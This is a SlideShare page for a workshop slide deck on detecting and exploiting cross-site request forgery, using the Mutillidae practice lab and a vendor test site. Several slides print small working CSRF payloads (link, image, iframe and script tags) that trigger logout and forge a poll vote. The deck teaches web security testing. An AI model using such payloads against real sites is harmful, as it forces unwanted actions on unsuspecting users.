SlideShare una empresa de Scribd logo

Oh no, was that CSRF #Ouch

Abhinav Sejpal
Abhinav Sejpal

Overview: Are you web developer / Tester / Architect, why don’t you stop sucking you web app against CSRF attacks? Mission :- This session is on detecting and exploiting CSRF / XSRF issues. At the end of this session, the participant will be able manually identify CSRF / XSRF vulnerabilities in web applications. URL :- http://weekendtesting.com/archives/3843 Agenda :- Introduction What is Cross Side Request Forgery CSRF check & How to test (Iron OWASP , CSRF Finders) Prevention of CSRF attacks Q & A Prerequisite knowledge: Basic Technical knowledge about web application

Tecnología
1 de 43
Descargar para leer sin conexión
  OH NO, WAS THAT  CSRF ? Abhinav Sejpal
WHO AM I I' M new Generation Exploratory Testy Researcher & Reader in free time Spekear at  Facilitator at Weekend Testing Crowd Tester (AKA. Bug bounty Hunter)   Reported Security Vulnerabilities for 50+ unique customers all over the world  inlcluding Apple, yahoo, Outlook, adobe & etc. Proficient at Functional, Usability , Accessibility & Compatibility Testing Love to develop nasty code  & Hack it :) Works as Quality Analyst at AKA. Bug Wrangler Null  & OWASP Co mmunity passbrains.com
~Publication ~
DISCLAIMER This Presentation is intended for educational purposes only and I cannot be held liable for any kind of damages done whatsoever to your machine, or other damages.   Please - Don't try this attack on any others system without having context knowledge or permission, this may harm to someone directly or indirectly. Feel free to use this presentation for practice or education purpose. ^ I hope - You gotcha ^
SOCIAL MEDIA FEED Hashtag for this session      # ,  #BitzNightTesting CSRF : Twitter handle for feedback :  @   @weekendtesting Abhinav_Sejpal G+  http://goo.gl/kMAOs1
AGENDA Introducation Set up Pen Testing LAB Overview of HTTP Request Intercept the HTTP Request using Proxy (MITM) Understanding cross site attacks Testing for a cross site request forgery risk Attack Anti-forgery Attacks Common Defences Against CSRF
SETUP THE TEST LAB Install XAMPP for:Acronym X (to be read as "cross", meaning )cross-platform Apache HTTP Server MySQL PHP Perl
Why MySQL?  is  Girlfriend of PHP TARGETED APPLICATION Client Side language : HTML & Javascript Server side Language: PHP DB : MYSQL  Why PHP ?  - Any answer Here? MySQL <3 
http://w3techs.com/technologies/overview/programming_lang PHP IS USED BY 82.2% OF ALL THE WEBSITES AS SERVER-SIDE PROGRAMMING LANGUAGE.
PHP: 244M SITES 2.1M IP ADDRESSES
2013 Server-side Programming Language of the Year Don't Mind Power of PHP > Facebook & yahoo  http://w3techs.com/blog/entry/web_technologies_of_the_year
It's a free, open source web application provided to allow security enthusiast to pen-test and hack a web application. V.2X developed by  aka PLAY GROUND  MUTILLIDAE Jeremy Druin webpwnized.
ALL SET WITH MULTILLIDAE ?
AM I VULNERABLE TO 'CSRF' ?
OWASP A8 - CSRF CROSS-SITE REQUEST FORGERY
Facebook Post Linkedin Panel
HOW WEB WORKS ?
' Send Request '
Proxy (Man in the middle) Intercept Request & Respond from client
CSRF ATTACK CYCLE
CSRF AKA. XSRF   THE ATTACKER EXPLOITS THE TRUST A WEBSITE HAS AGAINST A USER’S BROWSER.  Permission fakingstealing  Disruption of the normal sequence of the site
http://127.0.0.1/xampp/mutillidae/index.php?do=logout DEMO #1 Login ID - admin password - adminpass HTTP GET Request
<a href= > : ANSWER  DEMO 1: <html> <title> CSRF Demo 1 </title> http://127.0.0.1/xampp/mutillidae/index.php? do=logout Click me </a> </html>
Yes it's not dangerous but annoying UNDERSTANDING Logout page has a simple HTTP GET that required no confirmation Every user who visited that page would immediately be logged out - that's CSRF in action.
SO WHAT DO YOU THINK, IT'S ALL ABOUT CLICK ? ssh, No!! Would you like to write CSRF exploit without click ??
<img src= > CSRF GET Request with Image Tag <html> <title> CSRF Demo 1 </title> http://127.0.0.1/xampp/mutillidae/index.php? do=logout </html>
HTTP REQUEST <iframe src=" http://127.0.0.1/xampp/mutillidae/index.php? do=logout"></iframe>            <script> var X= new Image();                                                X.src= " http://127.0.0.1/xampp/mutillidae/index.php?do=logout ";                 </script>
CHALLENGE  #1
<html> <title> CSRF Demo 1 </title> <a href = > Click me </a> </html> :: SOLUTION #1 :: http://127.0.0.1/xampp/mutillidae/index.php? page=user-poll.php&csrf- token=&choice=nmap&initials=n&user-poll-php-submit- button=Submit+Vote
DOES IT EASY TO CREATE CSRF HTTP REQUEST ? No - you should try out   IronWASP    CSRF PoC Generator - Tool for automatically generating exploits for CSRF vulnerabilities * One Click POC * * Hybrid automation * thanks a ton to Lava & Jayesh 
{ Post HTTP Request } CHALLENGE  #2
CHALLENGE  #3 Add user with out admin knowledge
LIVE CHALLENGE * SIGNUP DISABLED * PLEASE USE THE USERNAME TEST AND THE PASSWORD TEST CSRF & XSRF Update the user info. without their knowledge http://testphp.vulnweb.com/userinfo.php Copyright © 2014, Acunetix Ltd
Can we exploit this with Level #2 ? You've been CSRF'd with static token! 
Lets try with Level - 3
~ Keep Hacking your Code ~ There is no silver bullet to stop this - Just Trust your code
POPULAR COOL FINDINGS by AmolFacebook CSRF worth USD 5000 GOOGLE GROUPS PROFILE CSRF Google Account display pic deletion Facebook Account deactivation Advance Leanings -  CSRF Token Validation Fail http://haiderm.com/csrf-token-protection-bypass-methods/
INDIAN HACKERS/INFOSEC GUYS & GROUPS YOU SHOULD BE FOLLOWING IN TWITTER Thank-you http://garage4hackers.com/ community
- Twitter Folks -  @  @ , @ , @   CREDITS riyazwalikar TroyHunt yog3sharma makash & @ Big thank You to @  , @  & you All. anatshri weekendtesting srinivasskc
YES - I'M DONE! Feel free to write me at bug.wrangler at outlook.com
LICENSE AND COPYRIGHTS https://slides.com/abhinavsejpal/weekend-testing-csrf copyrights 2013-2014 Abhinav Sejpal -----   ( CC BY-NC-ND 3.0) Attribution-NonCommercial-NoDerivs 3.0 Unported   Dedicated to my lovely daddy

Recomendados

Android mobile app security offensive security workshop
Android mobile app security offensive security workshopAndroid mobile app security offensive security workshop
Android mobile app security offensive security workshopAbhinav Sejpal
 
Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Abhinav Sejpal
 
Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Abhinav Sejpal
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Shubham Gupta
 
Road map to getting your first cve
Road map to getting your first cveRoad map to getting your first cve
Road map to getting your first cveShreya Pohekar
 
Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.n|u - The Open Security Community
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Sagar M Parmar
 
Perform fuzz on appplications web interface
Perform fuzz on appplications web interfacePerform fuzz on appplications web interface
Perform fuzz on appplications web interfaceIndicThreads
 

Recomendados

Android mobile app security offensive security workshop
Android mobile app security offensive security workshopAndroid mobile app security offensive security workshop
Android mobile app security offensive security workshopAbhinav Sejpal
 
Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Owasp top 10 web application security hazards - Part 1
Owasp top 10 web application security hazards - Part 1Abhinav Sejpal
 
Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Owasp top 10 web application security hazards part 2
Owasp top 10 web application security hazards part 2Abhinav Sejpal
 
Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Bug Bounty #Defconlucknow2016
Bug Bounty #Defconlucknow2016Shubham Gupta
 
Road map to getting your first cve
Road map to getting your first cveRoad map to getting your first cve
Road map to getting your first cveShreya Pohekar
 
Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.n|u - The Open Security Community
 
Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Bug bounty null_owasp_2k17
Bug bounty null_owasp_2k17Sagar M Parmar
 
Perform fuzz on appplications web interface
Perform fuzz on appplications web interfacePerform fuzz on appplications web interface
Perform fuzz on appplications web interfaceIndicThreads
 
How i got my first cve
How i got my first cveHow i got my first cve
How i got my first cvenullowaspmumbai
 
GoSec 2015 - Protecting the web from within
GoSec 2015 - Protecting the web from withinGoSec 2015 - Protecting the web from within
GoSec 2015 - Protecting the web from withinIMMUNIO
 
Csrf not all defenses are created equal
Csrf not all defenses are created equalCsrf not all defenses are created equal
Csrf not all defenses are created equalAri Elias-Bachrach
 
Nbt con december-2014-slides
Nbt con december-2014-slidesNbt con december-2014-slides
Nbt con december-2014-slidesBehrouz Sadeghipour
 
Your WordPress Website Is/Not Hacked
Your WordPress Website Is/Not HackedYour WordPress Website Is/Not Hacked
Your WordPress Website Is/Not HackedAngela Bowman
 
RailsConf 2015 - Metasecurity: Beyond Patching Vulnerabilities
RailsConf 2015 - Metasecurity: Beyond Patching VulnerabilitiesRailsConf 2015 - Metasecurity: Beyond Patching Vulnerabilities
RailsConf 2015 - Metasecurity: Beyond Patching VulnerabilitiesIMMUNIO
 
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012Nir Goldshlager
 
How to Get Started with Cypress
How to Get Started with CypressHow to Get Started with Cypress
How to Get Started with CypressApplitools
 
State of Web Security RailsConf 2016
State of Web Security RailsConf 2016State of Web Security RailsConf 2016
State of Web Security RailsConf 2016IMMUNIO
 
ESAPI
ESAPIESAPI
ESAPIn|u - The Open Security Community
 
DEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still WorksDEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still WorksRuss McRee
 
Afterlife Tales: Troubleshooting containerized applications
Afterlife Tales: Troubleshooting containerized applicationsAfterlife Tales: Troubleshooting containerized applications
Afterlife Tales: Troubleshooting containerized applicationsAna-Maria Mihalceanu
 
Composer at Scale, Release and Dependency Management
Composer at Scale, Release and Dependency ManagementComposer at Scale, Release and Dependency Management
Composer at Scale, Release and Dependency ManagementJoe Ferguson
 
Securing Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad LaskySecuring Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad Laskywordcampgc
 
Put an end to regression with codeception testing
Put an end to regression with codeception testingPut an end to regression with codeception testing
Put an end to regression with codeception testingJoe Ferguson
 
Midwest PHP 2017 DevOps For Small team
Midwest PHP 2017 DevOps For Small teamMidwest PHP 2017 DevOps For Small team
Midwest PHP 2017 DevOps For Small teamJoe Ferguson
 
javascript-gone-wild-withreferences-attributions-111003035611-php
javascript-gone-wild-withreferences-attributions-111003035611-phpjavascript-gone-wild-withreferences-attributions-111003035611-php
javascript-gone-wild-withreferences-attributions-111003035611-phpApoorvi Kapoor
 
Build 2017 - B8093 - Nextgen UWP app distribution: Building extensible, strea...
Build 2017 - B8093 - Nextgen UWP app distribution: Building extensible, strea...Build 2017 - B8093 - Nextgen UWP app distribution: Building extensible, strea...
Build 2017 - B8093 - Nextgen UWP app distribution: Building extensible, strea...Windows Developer
 
Backtrack Manual Part9
Backtrack Manual Part9Backtrack Manual Part9
Backtrack Manual Part9Nutan Kumar Panda
 
AtlasCamp 2011 - Five Strategies to Accelerate Plugin Development
AtlasCamp 2011 - Five Strategies to Accelerate Plugin DevelopmentAtlasCamp 2011 - Five Strategies to Accelerate Plugin Development
AtlasCamp 2011 - Five Strategies to Accelerate Plugin Developmentmrdon
 
CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCSuvash Shah
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryDaniel Miessler
 

Más contenido relacionado

La actualidad más candente

GoSec 2015 - Protecting the web from within
GoSec 2015 - Protecting the web from withinGoSec 2015 - Protecting the web from within
GoSec 2015 - Protecting the web from withinIMMUNIO
 
Csrf not all defenses are created equal
Csrf not all defenses are created equalCsrf not all defenses are created equal
Csrf not all defenses are created equalAri Elias-Bachrach
 
Your WordPress Website Is/Not Hacked
Your WordPress Website Is/Not HackedYour WordPress Website Is/Not Hacked
Your WordPress Website Is/Not HackedAngela Bowman
 
RailsConf 2015 - Metasecurity: Beyond Patching Vulnerabilities
RailsConf 2015 - Metasecurity: Beyond Patching VulnerabilitiesRailsConf 2015 - Metasecurity: Beyond Patching Vulnerabilities
RailsConf 2015 - Metasecurity: Beyond Patching VulnerabilitiesIMMUNIO
 
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012Nir Goldshlager
 
How to Get Started with Cypress
How to Get Started with CypressHow to Get Started with Cypress
How to Get Started with CypressApplitools
 
State of Web Security RailsConf 2016
State of Web Security RailsConf 2016State of Web Security RailsConf 2016
State of Web Security RailsConf 2016IMMUNIO
 
DEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still WorksDEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still WorksRuss McRee
 
Afterlife Tales: Troubleshooting containerized applications
Afterlife Tales: Troubleshooting containerized applicationsAfterlife Tales: Troubleshooting containerized applications
Afterlife Tales: Troubleshooting containerized applicationsAna-Maria Mihalceanu
 
Composer at Scale, Release and Dependency Management
Composer at Scale, Release and Dependency ManagementComposer at Scale, Release and Dependency Management
Composer at Scale, Release and Dependency ManagementJoe Ferguson
 
Securing Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad LaskySecuring Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad Laskywordcampgc
 
Put an end to regression with codeception testing
Put an end to regression with codeception testingPut an end to regression with codeception testing
Put an end to regression with codeception testingJoe Ferguson
 
Midwest PHP 2017 DevOps For Small team
Midwest PHP 2017 DevOps For Small teamMidwest PHP 2017 DevOps For Small team
Midwest PHP 2017 DevOps For Small teamJoe Ferguson
 
javascript-gone-wild-withreferences-attributions-111003035611-php
javascript-gone-wild-withreferences-attributions-111003035611-phpjavascript-gone-wild-withreferences-attributions-111003035611-php
javascript-gone-wild-withreferences-attributions-111003035611-phpApoorvi Kapoor
 
Build 2017 - B8093 - Nextgen UWP app distribution: Building extensible, strea...
Build 2017 - B8093 - Nextgen UWP app distribution: Building extensible, strea...Build 2017 - B8093 - Nextgen UWP app distribution: Building extensible, strea...
Build 2017 - B8093 - Nextgen UWP app distribution: Building extensible, strea...Windows Developer
 
AtlasCamp 2011 - Five Strategies to Accelerate Plugin Development
AtlasCamp 2011 - Five Strategies to Accelerate Plugin DevelopmentAtlasCamp 2011 - Five Strategies to Accelerate Plugin Development
AtlasCamp 2011 - Five Strategies to Accelerate Plugin Developmentmrdon
 

La actualidad más candente (20)

How i got my first cve
How i got my first cveHow i got my first cve
How i got my first cve
 
GoSec 2015 - Protecting the web from within
GoSec 2015 - Protecting the web from withinGoSec 2015 - Protecting the web from within
GoSec 2015 - Protecting the web from within
 
Csrf not all defenses are created equal
Csrf not all defenses are created equalCsrf not all defenses are created equal
Csrf not all defenses are created equal
 
Nbt con december-2014-slides
Nbt con december-2014-slidesNbt con december-2014-slides
Nbt con december-2014-slides
 
Your WordPress Website Is/Not Hacked
Your WordPress Website Is/Not HackedYour WordPress Website Is/Not Hacked
Your WordPress Website Is/Not Hacked
 
RailsConf 2015 - Metasecurity: Beyond Patching Vulnerabilities
RailsConf 2015 - Metasecurity: Beyond Patching VulnerabilitiesRailsConf 2015 - Metasecurity: Beyond Patching Vulnerabilities
RailsConf 2015 - Metasecurity: Beyond Patching Vulnerabilities
 
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
Nir goldshlager Killing a bug bounty program - twice Hack In The Box 2012
 
How to Get Started with Cypress
How to Get Started with CypressHow to Get Started with Cypress
How to Get Started with Cypress
 
State of Web Security RailsConf 2016
State of Web Security RailsConf 2016State of Web Security RailsConf 2016
State of Web Security RailsConf 2016
 
ESAPI
ESAPIESAPI
ESAPI
 
DEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still WorksDEFCON 17 Presentation: CSRF - Yeah, It Still Works
DEFCON 17 Presentation: CSRF - Yeah, It Still Works
 
Afterlife Tales: Troubleshooting containerized applications
Afterlife Tales: Troubleshooting containerized applicationsAfterlife Tales: Troubleshooting containerized applications
Afterlife Tales: Troubleshooting containerized applications
 
Composer at Scale, Release and Dependency Management
Composer at Scale, Release and Dependency ManagementComposer at Scale, Release and Dependency Management
Composer at Scale, Release and Dependency Management
 
Securing Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad LaskySecuring Your WordPress Website by Vlad Lasky
Securing Your WordPress Website by Vlad Lasky
 
Put an end to regression with codeception testing
Put an end to regression with codeception testingPut an end to regression with codeception testing
Put an end to regression with codeception testing
 
Midwest PHP 2017 DevOps For Small team
Midwest PHP 2017 DevOps For Small teamMidwest PHP 2017 DevOps For Small team
Midwest PHP 2017 DevOps For Small team
 
javascript-gone-wild-withreferences-attributions-111003035611-php
javascript-gone-wild-withreferences-attributions-111003035611-phpjavascript-gone-wild-withreferences-attributions-111003035611-php
javascript-gone-wild-withreferences-attributions-111003035611-php
 
Build 2017 - B8093 - Nextgen UWP app distribution: Building extensible, strea...
Build 2017 - B8093 - Nextgen UWP app distribution: Building extensible, strea...Build 2017 - B8093 - Nextgen UWP app distribution: Building extensible, strea...
Build 2017 - B8093 - Nextgen UWP app distribution: Building extensible, strea...
 
Backtrack Manual Part9
Backtrack Manual Part9Backtrack Manual Part9
Backtrack Manual Part9
 
AtlasCamp 2011 - Five Strategies to Accelerate Plugin Development
AtlasCamp 2011 - Five Strategies to Accelerate Plugin DevelopmentAtlasCamp 2011 - Five Strategies to Accelerate Plugin Development
AtlasCamp 2011 - Five Strategies to Accelerate Plugin Development
 

Destacado

CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCSuvash Shah
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryDaniel Miessler
 
Desform_emjam
Desform_emjamDesform_emjam
Desform_emjamJun Hu
 
Presentation experio des form 23 09-2013
Presentation experio des form 23 09-2013Presentation experio des form 23 09-2013
Presentation experio des form 23 09-2013Jun Hu
 
Sociale media voor fotografen: 4 basics en 10 quickwins
Sociale media voor fotografen: 4 basics en 10 quickwinsSociale media voor fotografen: 4 basics en 10 quickwins
Sociale media voor fotografen: 4 basics en 10 quickwinssimongryspeert
 
Facebook voor bestuurders
Facebook voor bestuurdersFacebook voor bestuurders
Facebook voor bestuurderssimongryspeert
 
smart objects and semantic web
smart objects and semantic websmart objects and semantic web
smart objects and semantic webJun Hu
 
World Oil and Gas Review 2015 - Eni
World Oil and Gas Review 2015 - EniWorld Oil and Gas Review 2015 - Eni
World Oil and Gas Review 2015 - EniFrancesco Legname
 
Roar Forbords minnecup 2011
Roar Forbords minnecup 2011Roar Forbords minnecup 2011
Roar Forbords minnecup 2011Rosenborgskole
 
De s form2013_wuxi_steffen.ppt
De s form2013_wuxi_steffen.pptDe s form2013_wuxi_steffen.ppt
De s form2013_wuxi_steffen.pptJun Hu
 

Destacado (11)

CSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVCCSRF Attack and Its Prevention technique in ASP.NET MVC
CSRF Attack and Its Prevention technique in ASP.NET MVC
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
 
Desform_emjam
Desform_emjamDesform_emjam
Desform_emjam
 
Presentation experio des form 23 09-2013
Presentation experio des form 23 09-2013Presentation experio des form 23 09-2013
Presentation experio des form 23 09-2013
 
Sociale media voor fotografen: 4 basics en 10 quickwins
Sociale media voor fotografen: 4 basics en 10 quickwinsSociale media voor fotografen: 4 basics en 10 quickwins
Sociale media voor fotografen: 4 basics en 10 quickwins
 
Vek.od.ua Креатив Перегуд
Vek.od.ua Креатив ПерегудVek.od.ua Креатив Перегуд
Vek.od.ua Креатив Перегуд
 
Facebook voor bestuurders
Facebook voor bestuurdersFacebook voor bestuurders
Facebook voor bestuurders
 
smart objects and semantic web
smart objects and semantic websmart objects and semantic web
smart objects and semantic web
 
World Oil and Gas Review 2015 - Eni
World Oil and Gas Review 2015 - EniWorld Oil and Gas Review 2015 - Eni
World Oil and Gas Review 2015 - Eni
 
Roar Forbords minnecup 2011
Roar Forbords minnecup 2011Roar Forbords minnecup 2011
Roar Forbords minnecup 2011
 
De s form2013_wuxi_steffen.ppt
De s form2013_wuxi_steffen.pptDe s form2013_wuxi_steffen.ppt
De s form2013_wuxi_steffen.ppt
 

Similar a Oh no, was that CSRF #Ouch

[Php Camp]Owasp Php Top5+Csrf
[Php Camp]Owasp Php Top5+Csrf[Php Camp]Owasp Php Top5+Csrf
[Php Camp]Owasp Php Top5+CsrfBipin Upadhyay
 
Javascript Security - Three main methods of defending your MEAN stack
Javascript Security - Three main methods of defending your MEAN stackJavascript Security - Three main methods of defending your MEAN stack
Javascript Security - Three main methods of defending your MEAN stackRan Bar-Zik
 
Modern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxModern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxC4Media
 
Squashing bugs: Introduction to Bug Bounties ISSA Dehradun Chapter
Squashing bugs: Introduction to Bug Bounties ISSA Dehradun ChapterSquashing bugs: Introduction to Bug Bounties ISSA Dehradun Chapter
Squashing bugs: Introduction to Bug Bounties ISSA Dehradun ChapterAvi Sharma
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxkarthikvcyber
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainInfosecTrain
 
Reversing & malware analysis training part 10 exploit development basics
Reversing & malware analysis training part 10 exploit development basicsReversing & malware analysis training part 10 exploit development basics
Reversing & malware analysis training part 10 exploit development basicsAbdulrahman Bassam
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfigurationzakieh alizadeh
 
Web Application Penetration Testing Introduction
Web Application Penetration Testing IntroductionWeb Application Penetration Testing Introduction
Web Application Penetration Testing Introductiongbud7
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxDARSHANBHAVSAR14
 
Mitigating CSRF with two lines of codes
Mitigating CSRF with two lines of codesMitigating CSRF with two lines of codes
Mitigating CSRF with two lines of codesMinhaz A V
 
Deep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalDeep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalIsao Takaesu
 
香港六合彩
香港六合彩香港六合彩
香港六合彩baoyin
 
What You Need to Know About Web App Security Testing in 2018
What You Need to Know About Web App Security Testing in 2018What You Need to Know About Web App Security Testing in 2018
What You Need to Know About Web App Security Testing in 2018Ken DeSouza
 

Similar a Oh no, was that CSRF #Ouch (20)

[Php Camp]Owasp Php Top5+Csrf
[Php Camp]Owasp Php Top5+Csrf[Php Camp]Owasp Php Top5+Csrf
[Php Camp]Owasp Php Top5+Csrf
 
Javascript Security - Three main methods of defending your MEAN stack
Javascript Security - Three main methods of defending your MEAN stackJavascript Security - Three main methods of defending your MEAN stack
Javascript Security - Three main methods of defending your MEAN stack
 
Bug Bounty 101
Bug Bounty 101Bug Bounty 101
Bug Bounty 101
 
Secure PHP Coding
Secure PHP CodingSecure PHP Coding
Secure PHP Coding
 
Modern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a FoxModern Web Security, Lazy but Mindful Like a Fox
Modern Web Security, Lazy but Mindful Like a Fox
 
Squashing bugs: Introduction to Bug Bounties ISSA Dehradun Chapter
Squashing bugs: Introduction to Bug Bounties ISSA Dehradun ChapterSquashing bugs: Introduction to Bug Bounties ISSA Dehradun Chapter
Squashing bugs: Introduction to Bug Bounties ISSA Dehradun Chapter
 
VAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptxVAPT_FINAL SLIDES.pptx
VAPT_FINAL SLIDES.pptx
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
 
Reversing & malware analysis training part 10 exploit development basics
Reversing & malware analysis training part 10 exploit development basicsReversing & malware analysis training part 10 exploit development basics
Reversing & malware analysis training part 10 exploit development basics
 
Cyber ppt
Cyber pptCyber ppt
Cyber ppt
 
Session10-PHP Misconfiguration
Session10-PHP MisconfigurationSession10-PHP Misconfiguration
Session10-PHP Misconfiguration
 
Web Application Penetration Testing Introduction
Web Application Penetration Testing IntroductionWeb Application Penetration Testing Introduction
Web Application Penetration Testing Introduction
 
VAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptxVAPT PRESENTATION full.pptx
VAPT PRESENTATION full.pptx
 
Bettercap
BettercapBettercap
Bettercap
 
Mitigating CSRF with two lines of codes
Mitigating CSRF with two lines of codesMitigating CSRF with two lines of codes
Mitigating CSRF with two lines of codes
 
Deep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 ArsenalDeep Exploit@Black Hat Europe 2018 Arsenal
Deep Exploit@Black Hat Europe 2018 Arsenal
 
Zed Attack Proxy (ZAP)
Zed Attack Proxy (ZAP)Zed Attack Proxy (ZAP)
Zed Attack Proxy (ZAP)
 
PHP Security
PHP SecurityPHP Security
PHP Security
 
香港六合彩
香港六合彩香港六合彩
香港六合彩
 
What You Need to Know About Web App Security Testing in 2018
What You Need to Know About Web App Security Testing in 2018What You Need to Know About Web App Security Testing in 2018
What You Need to Know About Web App Security Testing in 2018
 

Último

Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .From Family Reminiscence to Scholarly Archive .
From Family Reminiscence to Scholarly Archive .Alan Dix
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxLoriGlavin3
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek SchlawackFwdays
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024Lonnie McRorey
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Search Engine Optimization SEO PDF for 2024.pdf
